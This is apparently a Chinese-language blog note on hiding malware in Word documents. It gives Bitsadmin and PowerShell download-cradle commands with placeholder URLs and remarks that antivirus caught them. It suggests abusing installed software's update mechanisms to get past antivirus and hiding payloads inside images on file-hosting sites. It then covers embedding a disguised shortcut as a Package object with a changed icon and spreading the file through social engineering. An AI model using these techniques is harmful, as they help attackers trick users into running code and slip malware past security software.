Word 通过添加Package 实现word藏毒

这个思路要结合近期在一些安全网站上公布的姿势来实现，先科普几个地方。

（1）通过cmd本身就可以直接下载：

Bitsadmin /transfer AA /download /priority normal "http://..." "..."

其实讲道理也可以直接调用Bitsadmin.exe 和cmd没关系。问题是刚刚我测试一发，返现woc 360竟然报毒了？

然后我换了个姿势，直接cmd启动powershell下载：

cmd.exe /c powershell.exe $client = new-object System.Net.WebClient $client.DownloadFile('#1', '#2')

单独直接快捷方式调用powershell下载：

OK这三种方式都不行，看样360已经对这方面做出了处理，我们只能另找其他的方法。刚刚倒腾了好久，找到了解决方案了，可以直接利用第三方软件，比如本机上装了AAA产品，分析发的升级请求调用格式（这个地方有的保护了，有的没保护），然后直接调用他就没事了，不过这个地方就自然引入了一个局限性了呗。但好消息是很多的产品都存在这种漏洞，so...OK就说这么多，我可不想整理个笔记就惹来不好的事。

（2）ok第一个姿势就算普及玩了，虽然是瞬间打脸。第二个是近期又有网站曝光了那个图片藏毒的思路，其实这个思路比较老了，但是目前来说找到这么一个网站还是很容易的，前提是了解一下基本图片文件的格式，然后在不破坏原有格式的前提下混淆东西进去，然后上传到相关网站上。但问题是因为某些限制（像是今天说的这个姿势），我们只能去找可以转存exe文件的那种，或者是dll文件的那种，但是好消息是很容易找到，具体是哪个我不透漏可以自己去找。So文件下载和文件存储问题都搞定了。

（3）然后就是word添加package对象实现类似宏病毒的插入，当然不直接插入一个exe，这次是插入一个快捷方式，创建一个兼容上面1,2的快捷方式。我随便写一个测试的吧，就加入直接调用本地计算器（这个地方扩展很大，可以直接调用本地cmd,powershell,以及已经安装的其他程序，仅仅通过简单的字符串）。

然后添加到word里面的对象->package

之后在简单改下图标啥的，掩护一下。

（4）第四部分，也是最最重要的一个部分，就是通过什么手段去传播，这个地方就考验大家 社会工程学 的能力了，我垃圾，不在这里装逼。哈哈。OK就是这样，把这些东西简单穿一下线，这几个地方是前几天逛一些安全新闻网站看到的。随便总结下。没啥难点。